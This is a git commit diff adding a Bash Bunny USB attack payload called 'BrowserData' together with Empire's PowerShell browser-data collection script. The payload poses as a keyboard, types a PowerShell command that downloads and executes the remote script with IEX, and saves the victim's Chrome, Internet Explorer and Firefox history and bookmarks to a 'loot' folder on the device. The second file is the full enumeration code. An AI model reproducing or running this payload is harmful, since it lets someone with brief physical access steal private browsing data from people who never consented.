parent
fe70f7e5b4
commit
217dee5249
|
@ -0,0 +1,37 @@
|
|||
exit
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: BrowserData
|
||||
# Author: zachstanford
|
||||
# Version: 0.1 (Tested on Windows 10)
|
||||
#
|
||||
# Dumps browser info like history and bookmarks from powershell script
|
||||
# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
|
||||
# Credits to this Empire's powershell script:
|
||||
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
|
||||
|
||||
#script
|
||||
# Blue...............Running Script
|
||||
# Purple.............Finished
|
||||
|
||||
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
||||
source bunny_helpers.sh
|
||||
|
||||
LED R 200
|
||||
LOOTDIR=/root/udisk/loot/BrowserData
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
LED B 200
|
||||
|
||||
# wait 6 seconds for the storage to popup
|
||||
Q DELAY 6000
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING powershell "$bunny =(gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter); IEX (New-Object Net.WebClient).downloadstring("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-BrowserData.ps1"); Get-BrowserInformation | Out-File -Append $bunny\loot\BrowserData\$env:computername.txt;"
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
sync
|
||||
LED R B 200
|
239
payloads/library/powershell scripts/module_source/collection/Get-BrowserData.ps1
Executable file
239
payloads/library/powershell scripts/module_source/collection/Get-BrowserData.ps1
Executable file
|
@ -0,0 +1,239 @@
|
|||
function Get-BrowserInformation {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Dumps Browser Information
|
||||
Author: @424f424f
|
||||
License: BSD 3-Clause
|
||||
Required Dependencies: None
|
||||
Optional Dependencies: None
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
Enumerates browser history or bookmarks for a Chrome, Internet Explorer,
|
||||
and/or Firefox browsers on Windows machines.
|
||||
|
||||
.PARAMETER Browser
|
||||
|
||||
The type of browser to enumerate, 'Chrome', 'IE', 'Firefox' or 'All'
|
||||
|
||||
.PARAMETER Datatype
|
||||
|
||||
Type of data to enumerate, 'History' or 'Bookmarks'
|
||||
|
||||
.PARAMETER UserName
|
||||
|
||||
Specific username to search browser information for.
|
||||
|
||||
.PARAMETER Search
|
||||
|
||||
Term to search for
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
PS C:\> Get-BrowserInformation
|
||||
|
||||
Enumerates browser information for all supported browsers for all current users.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
PS C:\> Get-BrowserInformation -Browser IE -Datatype Bookmarks -UserName user1
|
||||
|
||||
Enumerates bookmarks for Internet Explorer for the user 'user1'.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
PS C:\> Get-BrowserInformation -Browser All -Datatype History -UserName user1 -Search 'github'
|
||||
|
||||
Enumerates bookmarks for Internet Explorer for the user 'user1' and only returns
|
||||
results matching the search term 'github'.
|
||||
#>
|
||||
[CmdletBinding()]
|
||||
Param
|
||||
(
|
||||
[Parameter(Position = 0)]
|
||||
[String[]]
|
||||
[ValidateSet('Chrome','IE','FireFox', 'All')]
|
||||
$Browser = 'All',
|
||||
|
||||
[Parameter(Position = 1)]
|
||||
[String[]]
|
||||
[ValidateSet('History','Bookmarks','All')]
|
||||
$DataType = 'All',
|
||||
|
||||
[Parameter(Position = 2)]
|
||||
[String]
|
||||
$UserName = '',
|
||||
|
||||
[Parameter(Position = 3)]
|
||||
[String]
|
||||
$Search = ''
|
||||
)
|
||||
|
||||
|
||||
|
||||
function ConvertFrom-Json20([object] $item){
|
||||
#http://stackoverflow.com/a/29689642
|
||||
Add-Type -AssemblyName System.Web.Extensions
|
||||
$ps_js = New-Object System.Web.Script.Serialization.JavaScriptSerializer
|
||||
return ,$ps_js.DeserializeObject($item)
|
||||
|
||||
}
|
||||
|
||||
function Get-ChromeHistory {
|
||||
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"
|
||||
if (-not (Test-Path -Path $Path)) {
|
||||
Write-Verbose "[!] Could not find Chrome History for username: $UserName"
|
||||
}
|
||||
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
|
||||
$Value = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
|
||||
$Value | ForEach-Object {
|
||||
$Key = $_
|
||||
if ($Key -match $Search){
|
||||
New-Object -TypeName PSObject -Property @{
|
||||
User = $UserName
|
||||
Browser = 'Chrome'
|
||||
DataType = 'History'
|
||||
Data = $_
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function Get-ChromeBookmarks {
|
||||
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"
|
||||
if (-not (Test-Path -Path $Path)) {
|
||||
Write-Verbose "[!] Could not find FireFox Bookmarks for username: $UserName"
|
||||
} else {
|
||||
$Json = Get-Content $Path
|
||||
$Output = ConvertFrom-Json20($Json)
|
||||
$Jsonobject = $Output.roots.bookmark_bar.children
|
||||
$Jsonobject.url |Sort -Unique | ForEach-Object {
|
||||
if ($_ -match $Search) {
|
||||
New-Object -TypeName PSObject -Property @{
|
||||
User = $UserName
|
||||
Browser = 'Firefox'
|
||||
DataType = 'Bookmark'
|
||||
Data = $_
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function Get-InternetExplorerHistory {
|
||||
#https://crucialsecurityblog.harris.com/2011/03/14/typedurls-part-1/
|
||||
|
||||
$Null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
|
||||
$Paths = Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
|
||||
|
||||
ForEach($Path in $Paths) {
|
||||
|
||||
$User = ([System.Security.Principal.SecurityIdentifier] $Path.PSChildName).Translate( [System.Security.Principal.NTAccount]) | Select -ExpandProperty Value
|
||||
|
||||
$Path = $Path | Select-Object -ExpandProperty PSPath
|
||||
|
||||
$UserPath = "$Path\Software\Microsoft\Internet Explorer\TypedURLs"
|
||||
if (-not (Test-Path -Path $UserPath)) {
|
||||
Write-Verbose "[!] Could not find IE History for SID: $Path"
|
||||
}
|
||||
else {
|
||||
Get-Item -Path $UserPath -ErrorAction SilentlyContinue | ForEach-Object {
|
||||
$Key = $_
|
||||
$Key.GetValueNames() | ForEach-Object {
|
||||
$Value = $Key.GetValue($_)
|
||||
if ($Value -match $Search) {
|
||||
New-Object -TypeName PSObject -Property @{
|
||||
User = $UserName
|
||||
Browser = 'IE'
|
||||
DataType = 'History'
|
||||
Data = $Value
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function Get-InternetExplorerBookmarks {
|
||||
$URLs = Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue
|
||||
ForEach ($URL in $URLs) {
|
||||
if ($URL.FullName -match 'Favorites') {
|
||||
$User = $URL.FullName.split('\')[2]
|
||||
Get-Content -Path $URL.FullName | ForEach-Object {
|
||||
try {
|
||||
if ($_.StartsWith('URL')) {
|
||||
# parse the .url body to extract the actual bookmark location
|
||||
$URL = $_.Substring($_.IndexOf('=') + 1)
|
||||
|
||||
if($URL -match $Search) {
|
||||
New-Object -TypeName PSObject -Property @{
|
||||
User = $User
|
||||
Browser = 'IE'
|
||||
DataType = 'Bookmark'
|
||||
Data = $URL
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch {
|
||||
Write-Verbose "Error parsing url: $_"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function Get-FireFoxHistory {
|
||||
$Path = "$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\"
|
||||
if (-not (Test-Path -Path $Path)) {
|
||||
Write-Verbose "[!] Could not find FireFox History for username: $UserName"
|
||||
}
|
||||
else {
|
||||
$Profiles = Get-ChildItem -Path "$Path\*.default\" -ErrorAction SilentlyContinue
|
||||
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
|
||||
$Value = Get-Content $Profiles\places.sqlite | Select-String -Pattern $Regex -AllMatches |Select-Object -ExpandProperty Matches |Sort -Unique
|
||||
$Value.Value |ForEach-Object {
|
||||
if ($_ -match $Search) {
|
||||
ForEach-Object {
|
||||
New-Object -TypeName PSObject -Property @{
|
||||
User = $UserName
|
||||
Browser = 'Firefox'
|
||||
DataType = 'History'
|
||||
Data = $_
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (!$UserName) {
|
||||
$UserName = "$ENV:USERNAME"
|
||||
}
|
||||
|
||||
if(($Browser -Contains 'All') -or ($Browser -Contains 'Chrome')) {
|
||||
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
|
||||
Get-ChromeHistory
|
||||
}
|
||||
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
|
||||
Get-ChromeBookmarks
|
||||
}
|
||||
}
|
||||
|
||||
if(($Browser -Contains 'All') -or ($Browser -Contains 'IE')) {
|
||||
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
|
||||
Get-InternetExplorerHistory
|
||||
}
|
||||
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
|
||||
Get-InternetExplorerBookmarks
|
||||
}
|
||||
}
|
||||
|
||||
if(($Browser -Contains 'All') -or ($Browser -Contains 'FireFox')) {
|
||||
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
|
||||
Get-FireFoxHistory
|
||||
}
|
||||
}
|
||||
}
|
Loading…
Reference in New Issue